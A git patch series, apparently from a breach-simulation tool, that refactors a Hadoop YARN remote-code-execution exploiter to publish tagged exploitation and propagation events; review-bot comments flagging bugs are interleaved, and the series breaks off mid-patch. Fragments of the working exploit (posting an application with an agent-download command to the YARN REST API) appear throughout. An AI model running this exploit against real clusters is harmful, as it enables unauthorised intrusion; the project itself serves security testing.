From fe864792f3db6b6264c9425a109c3484d7fdc9de Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Tue, 4 Oct 2022 13:05:10 +0200 Subject: [PATCH 01/17] Agent: Publish Propagation and Exploitation events from Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 1b7c54470..4fdd308a2 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -40,11 +40,19 @@ class HadoopExploiter(WebRCE): urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: + self.publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=False, + ) return self.exploit_result try: monkey_path_on_victim = get_agent_dst_path(self.host) except KeyError: + self.publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=False, + ) return self.exploit_result http_path, http_thread = HTTPTools.create_locked_transfer( @@ -58,6 +66,12 @@ class HadoopExploiter(WebRCE): self.add_executed_cmd(command) self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True + + self.publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=True, + ) + self.publish_propagation_event(target=self.host.ip_addr, propagation_success=True) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() From 9c185a3a785419b33d7b0ee27a07be51bda3c797 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Tue, 4 Oct 2022 16:39:10 +0200 Subject: [PATCH 02/17] Agent: Add tags and error messages in Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 4fdd308a2..5a878621e 100644 
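Review bot: In the `@@ -58,6 +66,12 @@` hunk the propagation event is published with `propagation_success=True` the moment `exploit()` returns, before the `finally` block's `http_thread.join(self.DOWNLOAD_TIMEOUT)` has given the agent transfer a chance to complete or time out, so the event can report a propagation that never happened. The exploitation event fits at this point, but the propagation event would be more honest after the join, where the transfer thread's outcome can be consulted; if that thread exposes no result, a comment such as `# NOTE: propagation is assumed successful once the YARN submission is accepted; the transfer is not verified` should sit above the publish call. `_exploit_host` begins before the first hunk and its `return self.exploit_result` lies after the last one.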
--- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -5,6 +5,7 @@ """ import json +import logging import posixpath import random import string @@ -12,6 +13,7 @@ import string import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT +from common.tags import T1203_ATTACK_TECHNIQUE_TAG from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE @@ -23,6 +25,10 @@ from infection_monkey.model import ( ) from infection_monkey.utils.commands import build_monkey_commandline +logger = logging.getLogger(__name__) + +HADOOP_EXPLOITER_TAG = "hadoop-exploiter" + class HadoopExploiter(WebRCE): _EXPLOITED_SERVICE = "Hadoop" @@ -40,18 +46,24 @@ class HadoopExploiter(WebRCE): urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: + self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" self.publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, + error_message=self.exploit_result.error_message, + tags=(HADOOP_EXPLOITER_TAG,), ) return self.exploit_result try: monkey_path_on_victim = get_agent_dst_path(self.host) except KeyError: + self.exploit_result.error_message = f"No coressponding agent found for {self.host}" self.publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, + error_message=self.exploit_result.error_message, + tags=(HADOOP_EXPLOITER_TAG,), ) return self.exploit_result 
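Review bot: `self.exploit.error_message = f"No vulnerable urls has been found for {self.host}"` in the `@@ -40,18 +46,24 @@` hunk assigns to the bound method `exploit`, not to `self.exploit_result`; CPython rejects attribute assignment on a method object with AttributeError, so the no-vulnerable-URL path now raises instead of returning, and the `error_message=self.exploit_result.error_message` argument two lines below would read a value this line never set. The line should be `self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}"`. The second branch bakes a typo into a message that is shipped in events: `f"No corresponding agent found for {self.host}"`. `_exploit_host` continues past the end of this hunk.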
@@ -70,8 +82,13 @@ class HadoopExploiter(WebRCE): self.publish_exploitation_event( target=self.host.ip_addr, exploitation_success=True, + tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + ) + self.publish_propagation_event( + target=self.host.ip_addr, + propagation_success=True, + tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) - self.publish_propagation_event(target=self.host.ip_addr, propagation_success=True) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() From 57af6403170901aee898e1698124930682f255c8 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 18:26:03 +0000 Subject: [PATCH 03/17] Agent: Use correct publish method names --- monkey/infection_monkey/exploit/hadoop.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 5a878621e..deece024c 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -47,7 +47,7 @@ class HadoopExploiter(WebRCE): self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" - self.publish_exploitation_event( + self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, @@ -59,7 +59,7 @@ class HadoopExploiter(WebRCE): monkey_path_on_victim = get_agent_dst_path(self.host) except KeyError: self.exploit_result.error_message = f"No coressponding agent found for {self.host}" - self.publish_exploitation_event( + self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, 
@@ -79,12 +79,12 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self.publish_exploitation_event( + self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) - self.publish_propagation_event( + self._publish_propagation_event( target=self.host.ip_addr, propagation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), From bee1047024bae4a37f00ae95abf412ee092a13b7 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:16:22 +0000 Subject: [PATCH 04/17] Agent: Update hadoop failed event publishing --- monkey/infection_monkey/exploit/hadoop.py | 27 +++++++++++------------ 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index deece024c..743cf793e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -55,22 +55,13 @@ class HadoopExploiter(WebRCE): ) return self.exploit_result - try: - monkey_path_on_victim = get_agent_dst_path(self.host) - except KeyError: - self.exploit_result.error_message = f"No coressponding agent found for {self.host}" - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, - error_message=self.exploit_result.error_message, - tags=(HADOOP_EXPLOITER_TAG,), - ) - return self.exploit_result + monkey_path_on_victim = get_agent_dst_path(self.host) http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(monkey_path_on_victim), self.agent_binary_repository ) + tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG) try: command = self._build_command(monkey_path_on_victim, http_path) 
@@ -89,13 +80,21 @@ class HadoopExploiter(WebRCE): propagation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) + else: + error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" + self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) + self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + except requests.RequestException as err: + error_message = str(err) + self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) + self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() return self.exploit_result - def exploit(self, url, command): + def exploit(self, url: str, command: str): if self._is_interrupted(): self._set_interrupted() return False @@ -104,8 +103,8 @@ class HadoopExploiter(WebRCE): resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT ) - resp = json.loads(resp.content) - app_id = resp["application-id"] + resp_dict = json.loads(resp.content) + app_id = resp_dict["application-id"] # Create a random name for our application in YARN # random.SystemRandom can block indefinitely in Linux From c31aed94eaedfad5a9eec1f7ce31d4d8405052a2 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:30:42 +0000 Subject: [PATCH 05/17] Agent: Move successful explotiation event publish --- monkey/infection_monkey/exploit/hadoop.py | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 743cf793e..c12be142d 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py 
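Review bot: `except requests.RequestException` in the `@@ -89,13 +80,21 @@` hunk is now the only handler left in `_exploit_host`, but the failures most likely on a non-YARN port are not `RequestException`s: `exploit()` (hunk `@@ -104,8 +103,8 @@`) runs `json.loads(resp.content)` and `resp_dict["application-id"]` without checking `resp.status_code`, so an HTML error page or an auth challenge from the ResourceManager raises `ValueError`/`KeyError`, which escapes `_exploit_host` with no failure event published, and the same patch drops the `KeyError` guard around `get_agent_dst_path`, so that case escapes as well. Adding `resp.raise_for_status()` after the new-application POST converts HTTP errors into a `RequestException` the handler already covers, and widening it to `except (requests.RequestException, ValueError, KeyError) as err:` covers the parse failures. The positional calls `self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message)` assume a (target, success, tags, error_message) order while the keyword calls earlier in the file pass `error_message` before `tags`; worth confirming against the `WebRCE` signature, which is not in this diff.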
@@ -70,11 +70,6 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=True, - tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), - ) self._publish_propagation_event( target=self.host.ip_addr, propagation_success=True, @@ -120,7 +115,15 @@ class HadoopExploiter(WebRCE): resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) - return resp.status_code == 202 + + success = resp.status_code == 202 + if success: + self._publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=True, + tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + ) + return success def check_if_exploitable(self, url): try: From 54b551b7287083bd77676326b9f287b4f33a32e1 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:43:14 +0000 Subject: [PATCH 06/17] Agent: Update tags for hadoop events --- monkey/infection_monkey/exploit/hadoop.py | 29 ++++++++++++++++------- 1 file changed, 20 insertions(+), 9 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index c12be142d..ff6e9274b 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -13,7 +13,11 @@ import string import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT -from common.tags import T1203_ATTACK_TECHNIQUE_TAG +from common.tags import ( + T1203_ATTACK_TECHNIQUE_TAG, + T1210_ATTACK_TECHNIQUE_TAG, + T1570_ATTACK_TECHNIQUE_TAG, +) from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE 
@@ -28,6 +32,8 @@ from infection_monkey.utils.commands import build_monkey_commandline logger = logging.getLogger(__name__) HADOOP_EXPLOITER_TAG = "hadoop-exploiter" +EXPLOIT_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) +PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1570_ATTACK_TECHNIQUE_TAG) class HadoopExploiter(WebRCE): @@ -51,7 +57,7 @@ class HadoopExploiter(WebRCE): target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, - tags=(HADOOP_EXPLOITER_TAG,), + tags=PROPAGATION_TAGS, ) return self.exploit_result @@ -61,7 +67,6 @@ class HadoopExploiter(WebRCE): self.host, str(monkey_path_on_victim), self.agent_binary_repository ) - tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG) try: command = self._build_command(monkey_path_on_victim, http_path) @@ -73,16 +78,22 @@ class HadoopExploiter(WebRCE): self._publish_propagation_event( target=self.host.ip_addr, propagation_success=True, - tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + tags=PROPAGATION_TAGS, ) else: error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" - self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) - self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + self._publish_exploitation_event( + self.host.ip_addr, False, EXPLOIT_TAGS, error_message + ) + self._publish_propagation_event( + self.host.ip_addr, False, PROPAGATION_TAGS, error_message + ) except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) - self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + self._publish_exploitation_event(self.host.ip_addr, False, EXPLOIT_TAGS, error_message) + self._publish_propagation_event( + self.host.ip_addr, False, PROPAGATION_TAGS, error_message + ) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() 
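Review bot: `EXPLOIT_TAGS` in the `@@ -28,6 +32,8 @@` hunk carries `T1203_ATTACK_TECHNIQUE_TAG`, but ATT&CK T1203 is Exploitation for Client Execution, which covers exploiting client-side applications such as browsers and document readers; submitting an application through an exposed YARN ResourceManager REST API is a server-side remote-service abuse, which the `T1210_ATTACK_TECHNIQUE_TAG` already in the tuple describes, and T1190 (Exploit Public-Facing Application) would be the closer second technique if one is wanted. If T1203 is kept on purpose for parity with how other exploiters in the project are tagged, a one-line comment above the tuple saying so, e.g. `# T1203 retained for parity with the other exploiters' tagging`, would stop the next reader from "fixing" it. The PROPAGATION_TAGS mapping to T1570 is not affected by this point.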
@@ -121,7 +132,7 @@ class HadoopExploiter(WebRCE): self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=True, - tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + tags=EXPLOIT_TAGS, ) return success From 76ae57281d74a9a7d5b435bde0021a2324d7d812 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 12:25:23 +0000 Subject: [PATCH 07/17] Agent: Use EXPLOIT_TAGS for exploitation event --- monkey/infection_monkey/exploit/hadoop.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index ff6e9274b..7d68798d4 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -57,7 +57,7 @@ class HadoopExploiter(WebRCE): target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, - tags=PROPAGATION_TAGS, + tags=EXPLOIT_TAGS, ) return self.exploit_result From 4a0a24dde2153bf8d3d9e4e70e563c1b6105d5d6 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:42:26 +0000 Subject: [PATCH 08/17] Agent: Update hadoop exploiter tags T1570 -> T1105 --- monkey/infection_monkey/exploit/hadoop.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 7d68798d4..c5a8b2cf3 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -14,9 +14,9 @@ import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.tags import ( + T1105_ATTACK_TECHNIQUE_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG, - T1570_ATTACK_TECHNIQUE_TAG, ) from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.http_tools import HTTPTools 
@@ -33,7 +33,7 @@ logger = logging.getLogger(__name__) HADOOP_EXPLOITER_TAG = "hadoop-exploiter" EXPLOIT_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1570_ATTACK_TECHNIQUE_TAG) +PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) class HadoopExploiter(WebRCE): From 3e592cfa69229880ba25b0de48b09f1b0cdd531e Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 18:25:40 +0000 Subject: [PATCH 09/17] Agent: Use exploiter tag properties --- monkey/infection_monkey/exploit/hadoop.py | 39 ++++++++--------------- 1 file changed, 14 insertions(+), 25 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index c5a8b2cf3..1f5932121 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -9,6 +9,7 @@ import logging import posixpath import random import string +from typing import Tuple import requests @@ -32,8 +33,6 @@ from infection_monkey.utils.commands import build_monkey_commandline logger = logging.getLogger(__name__) HADOOP_EXPLOITER_TAG = "hadoop-exploiter" -EXPLOIT_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) class HadoopExploiter(WebRCE): @@ -44,6 +43,12 @@ class HadoopExploiter(WebRCE): # Random string's length that's used for creating unique app name RAN_STR_LEN = 6 + def _exploiter_tags(self) -> Tuple[str, ...]: + return (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + + def _propagation_tags(self) -> Tuple[str, ...]: + return (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) + def __init__(self): super(HadoopExploiter, self).__init__() 
@@ -54,10 +59,8 @@ class HadoopExploiter(WebRCE): if not self.vulnerable_urls: self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, + False, error_message=self.exploit_result.error_message, - tags=EXPLOIT_TAGS, ) return self.exploit_result @@ -75,25 +78,15 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self._publish_propagation_event( - target=self.host.ip_addr, - propagation_success=True, - tags=PROPAGATION_TAGS, - ) + self._publish_propagation_event(True) else: error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" - self._publish_exploitation_event( - self.host.ip_addr, False, EXPLOIT_TAGS, error_message - ) - self._publish_propagation_event( - self.host.ip_addr, False, PROPAGATION_TAGS, error_message - ) + self._publish_exploitation_event(False, error_message=error_message) + self._publish_propagation_event(False, error_message=error_message) except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(self.host.ip_addr, False, EXPLOIT_TAGS, error_message) - self._publish_propagation_event( - self.host.ip_addr, False, PROPAGATION_TAGS, error_message - ) + self._publish_exploitation_event(False, error_message=error_message) + self._publish_propagation_event(False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -129,11 +122,7 @@ class HadoopExploiter(WebRCE): success = resp.status_code == 202 if success: - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=True, - tags=EXPLOIT_TAGS, - ) + self._publish_exploitation_event(True) return success def check_if_exploitable(self, url): From de5d365bb07e8bfce95f18dc846b188e08487bcc Mon Sep 17 00:00:00 2001 
From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 18:53:31 +0000 Subject: [PATCH 10/17] Agent: Publish events sooner --- monkey/infection_monkey/exploit/hadoop.py | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 1f5932121..4046a81b1 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -57,11 +57,7 @@ class HadoopExploiter(WebRCE): urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: - self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" - self._publish_exploitation_event( - False, - error_message=self.exploit_result.error_message, - ) + self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}" return self.exploit_result monkey_path_on_victim = get_agent_dst_path(self.host) @@ -78,11 +74,6 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self._publish_propagation_event(True) - else: - error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" - self._publish_exploitation_event(False, error_message=error_message) - self._publish_propagation_event(False, error_message=error_message) except requests.RequestException as err: error_message = str(err) self._publish_exploitation_event(False, error_message=error_message) @@ -121,8 +112,9 @@ class HadoopExploiter(WebRCE): ) success = resp.status_code == 202 - if success: - self._publish_exploitation_event(True) + message = "" if success else f"Failed to exploit via {url}" + self._publish_exploitation_event(success, error_message=message) + self._publish_propagation_event(success, error_message=message) return success def check_if_exploitable(self, url): From 76a3cb0ba0670bf8e0cd89c9825d47212b6d44bf Mon Sep 17 00:00:00 2001 
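Review bot: In the `@@ -121,8 +112,9 @@` hunk `exploit()` publishes a PropagationEvent with success as soon as the ResourceManager answers 202, but 202 only means the application submission was accepted; whether a container ever ran the command and fetched the agent from the `http_thread` transfer set up in `_exploit_host` is unknown here, and `exploit()` has no view of that transfer. The exploitation event belongs in this method, but the propagation event is better raised from `_exploit_host` after `http_thread.join(self.DOWNLOAD_TIMEOUT)` has run, with `propagation_success` reflecting the transfer outcome rather than the HTTP status. A later commit message in this series states that `exploit()` is also reached via the exploitability check, so as written every probed candidate URL appears to emit both events too.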
From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:16:06 +0000 Subject: [PATCH 11/17] Agent: Stamp time before exploit executes --- monkey/infection_monkey/exploit/hadoop.py | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 4046a81b1..0a5b986a6 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -9,6 +9,7 @@ import logging import posixpath import random import string +from time import time from typing import Tuple import requests @@ -66,8 +67,9 @@ class HadoopExploiter(WebRCE): self.host, str(monkey_path_on_victim), self.agent_binary_repository ) + command = self._build_command(monkey_path_on_victim, http_path) + stamp = time() try: - command = self._build_command(monkey_path_on_victim, http_path) if self.exploit(self.vulnerable_urls[0], command): self.add_executed_cmd(command) @@ -76,8 +78,8 @@ class HadoopExploiter(WebRCE): except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(False, error_message=error_message) - self._publish_propagation_event(False, error_message=error_message) + self._publish_exploitation_event(stamp, False, error_message=error_message) + self._publish_propagation_event(stamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() 
@@ -107,14 +109,15 @@ class HadoopExploiter(WebRCE): self._set_interrupted() return False + stamp = time() resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) success = resp.status_code == 202 message = "" if success else f"Failed to exploit via {url}" - self._publish_exploitation_event(success, error_message=message) - self._publish_propagation_event(success, error_message=message) + self._publish_exploitation_event(stamp, success, error_message=message) + self._publish_propagation_event(stamp, success, error_message=message) return success def check_if_exploitable(self, url): From 8f6df12d9ceb2a5dda9f30da4388287d64de68e9 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 12:58:19 +0200 Subject: [PATCH 12/17] Agent: Modify HadoopExploiter tags to be properties --- monkey/infection_monkey/exploit/hadoop.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 0a5b986a6..18e4d70c6 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -10,7 +10,6 @@ import posixpath import random import string from time import time -from typing import Tuple import requests @@ -44,11 +43,9 @@ class HadoopExploiter(WebRCE): # Random string's length that's used for creating unique app name RAN_STR_LEN = 6 - def _exploiter_tags(self) -> Tuple[str, ...]: - return (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + _exploiter_tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) - def _propagation_tags(self) -> Tuple[str, ...]: - return (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) + _propagation_tags = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) def __init__(self): super(HadoopExploiter, self).__init__() From 8bdb30dcfb4552d0a09090b5959ee51e42f31462 Mon Sep 17 00:00:00 2001 
From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:05:48 +0200 Subject: [PATCH 13/17] Agent: Rename stamp to timestamp in Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 18e4d70c6..9c5805b5e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -65,7 +65,7 @@ class HadoopExploiter(WebRCE): ) command = self._build_command(monkey_path_on_victim, http_path) - stamp = time() + timestamp = time() try: if self.exploit(self.vulnerable_urls[0], command): @@ -75,8 +75,8 @@ class HadoopExploiter(WebRCE): except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(stamp, False, error_message=error_message) - self._publish_propagation_event(stamp, False, error_message=error_message) + self._publish_exploitation_event(timestamp, False, error_message=error_message) + self._publish_propagation_event(timestamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -106,15 +106,15 @@ class HadoopExploiter(WebRCE): self._set_interrupted() return False - stamp = time() + timestamp = time() resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) success = resp.status_code == 202 message = "" if success else f"Failed to exploit via {url}" - self._publish_exploitation_event(stamp, success, error_message=message) - self._publish_propagation_event(stamp, success, error_message=message) + self._publish_exploitation_event(timestamp, success, error_message=message) + self._publish_propagation_event(timestamp, success, error_message=message) return success def check_if_exploitable(self, url): From c02d43556ac5d93d27651a3473f22a96b90c4535 Mon Sep 17 00:00:00 2001 
From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:14:55 +0200 Subject: [PATCH 14/17] Agent: Make Hadoop tags uppercase --- monkey/infection_monkey/exploit/hadoop.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 9c5805b5e..f9a186bd5 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -43,9 +43,9 @@ class HadoopExploiter(WebRCE): # Random string's length that's used for creating unique app name RAN_STR_LEN = 6 - _exploiter_tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + _EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) - _propagation_tags = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) + _PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) def __init__(self): super(HadoopExploiter, self).__init__() From 25073be9f3945b5caa606cb9b5571acf362f8c62 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Fri, 7 Oct 2022 11:22:27 +0200 Subject: [PATCH 15/17] Agent: Remove adding vulnerable urls in Hadoop Adding vulnerable ulrs causes check to see if the target is exploitable which calls self.exploit --- monkey/infection_monkey/exploit/hadoop.py | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff 